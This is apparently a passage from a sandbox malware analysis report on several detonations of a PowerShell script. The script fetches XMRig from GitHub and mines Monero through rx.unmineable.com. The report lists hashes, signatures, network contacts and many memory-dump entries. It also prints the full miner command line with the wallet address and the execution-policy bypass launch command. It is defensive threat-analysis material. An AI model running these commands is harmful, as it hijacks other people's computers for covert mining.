US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 11.179.89.13.in-addr.arpa udp

Files

memory/2856-0-0x00007FFA8F233000-0x00007FFA8F235000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5slrnlro.44c.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2856-6-0x0000017F68D40000-0x0000017F68D62000-memory.dmp

memory/2856-11-0x00007FFA8F230000-0x00007FFA8FCF1000-memory.dmp

memory/2856-12-0x00007FFA8F230000-0x00007FFA8FCF1000-memory.dmp

memory/2856-14-0x00007FFA8F230000-0x00007FFA8FCF1000-memory.dmp

memory/2856-16-0x0000017F68D80000-0x0000017F68D8A000-memory.dmp

memory/2856-15-0x0000017F697A0000-0x0000017F697B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4908-47-0x0000015869A20000-0x0000015869A40000-memory.dmp

memory/4908-48-0x000001586B360000-0x000001586B380000-memory.dmp

memory/4908-49-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/2856-50-0x00007FFA8F233000-0x00007FFA8F235000-memory.dmp

memory/4908-53-0x000001586B3A0000-0x000001586B3C0000-memory.dmp

memory/4908-52-0x000001586B380000-0x000001586B3A0000-memory.dmp

memory/2856-51-0x00007FFA8F230000-0x00007FFA8FCF1000-memory.dmp

memory/4908-54-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/2856-55-0x00007FFA8F230000-0x00007FFA8FCF1000-memory.dmp

memory/4908-56-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-57-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-59-0x000001586B3A0000-0x000001586B3C0000-memory.dmp

memory/4908-58-0x000001586B380000-0x000001586B3A0000-memory.dmp

memory/4908-60-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-61-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-62-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-63-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-64-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-65-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-66-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-67-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-68-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-69-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-70-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-71-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-72-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-73-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-74-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-75-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-76-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-77-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-78-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-79-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-80-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-81-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-82-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-83-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-84-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-85-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-86-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-87-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-88-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-89-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-90-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-91-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-92-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-93-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-94-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-95-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-96-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-97-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-98-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-99-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-100-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-101-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-102-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-103-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-104-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-105-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-106-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-107-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-108-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-109-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-110-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-111-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-112-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-113-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-114-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-115-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-116-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-117-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-118-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:32

Platform

win11-20240419-en

Max time kernel

1798s

Max time network

1772s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/1612-0-0x00007FF864F03000-0x00007FF864F05000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bswagwlb.piw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1612-9-0x00007FF864F00000-0x00007FF8659C2000-memory.dmp

memory/1612-10-0x000001A7AD4F0000-0x000001A7AD512000-memory.dmp

memory/1612-11-0x00007FF864F00000-0x00007FF8659C2000-memory.dmp

memory/1612-12-0x00007FF864F00000-0x00007FF8659C2000-memory.dmp

memory/1612-14-0x000001A7C5C50000-0x000001A7C5C62000-memory.dmp

memory/1612-15-0x000001A7C5C40000-0x000001A7C5C4A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4868-46-0x00000167C2660000-0x00000167C2680000-memory.dmp

memory/4868-47-0x00000167C26A0000-0x00000167C26C0000-memory.dmp

memory/4868-48-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/1612-49-0x00007FF864F03000-0x00007FF864F05000-memory.dmp

memory/1612-50-0x00007FF864F00000-0x00007FF8659C2000-memory.dmp

memory/4868-52-0x00000167C26C0000-0x00000167C26E0000-memory.dmp

memory/4868-51-0x00000167C26E0000-0x00000167C2700000-memory.dmp

memory/4868-53-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/1612-54-0x00007FF864F00000-0x00007FF8659C2000-memory.dmp

memory/4868-55-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-58-0x00000167C26C0000-0x00000167C26E0000-memory.dmp

memory/4868-57-0x00000167C26E0000-0x00000167C2700000-memory.dmp

memory/4868-56-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-59-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-60-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-61-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-62-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-63-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-64-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-65-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-66-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-67-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-68-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-69-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-70-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-71-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-72-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-73-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-74-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-75-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-76-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-77-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-78-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-79-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-80-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-81-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-82-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-83-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-84-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-85-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-86-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-87-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-88-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-89-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-90-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-91-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-92-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-93-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-94-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-95-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-96-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-97-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-98-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-99-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-100-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-101-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-102-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-103-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-104-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-105-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-106-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-107-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-108-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-109-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-110-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-111-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-112-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-113-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-114-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-115-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-116-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-117-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:41

Platform

win11-20240508-en

Max time kernel

1789s

Max time network

1747s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/4260-0-0x00007FFAC46D3000-0x00007FFAC46D5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a32l4uce.iu4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4260-10-0x00007FFAC46D0000-0x00007FFAC5192000-memory.dmp

memory/4260-9-0x00000153E8EE0000-0x00000153E8F02000-memory.dmp

memory/4260-11-0x00007FFAC46D0000-0x00007FFAC5192000-memory.dmp

memory/4260-12-0x00007FFAC46D0000-0x00007FFAC5192000-memory.dmp

memory/4260-14-0x00000153E90C0000-0x00000153E90D2000-memory.dmp

memory/4260-15-0x00000153E90B0000-0x00000153E90BA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4256-46-0x000001F06AE00000-0x000001F06AE20000-memory.dmp

memory/4256-47-0x000001F06C570000-0x000001F06C590000-memory.dmp

memory/4256-48-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4260-49-0x00007FFAC46D3000-0x00007FFAC46D5000-memory.dmp

memory/4260-50-0x00007FFAC46D0000-0x00007FFAC5192000-memory.dmp

memory/4256-53-0x000001F06C5B0000-0x000001F06C5D0000-memory.dmp

memory/4256-52-0x000001F06C590000-0x000001F06C5B0000-memory.dmp

memory/4256-51-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4260-54-0x00007FFAC46D0000-0x00007FFAC5192000-memory.dmp

memory/4256-55-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-56-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-57-0x000001F06C590000-0x000001F06C5B0000-memory.dmp

memory/4256-58-0x000001F06C5B0000-0x000001F06C5D0000-memory.dmp

memory/4256-59-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-60-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-61-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-62-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-63-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-64-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-65-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-66-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-67-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-68-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-69-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-70-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-71-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-72-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-73-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-74-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-75-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-76-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-77-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-78-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-79-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-80-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-81-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-82-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-83-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-84-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-85-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-86-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-87-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-88-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-89-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-90-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-91-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-92-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-93-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-94-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-95-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-96-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-97-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-98-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-99-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-100-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-101-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-102-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-103-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-104-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-105-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-106-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

memory/4256-107-0x00007FF60B160000-0x00007FF60BD93000-memory.dmp

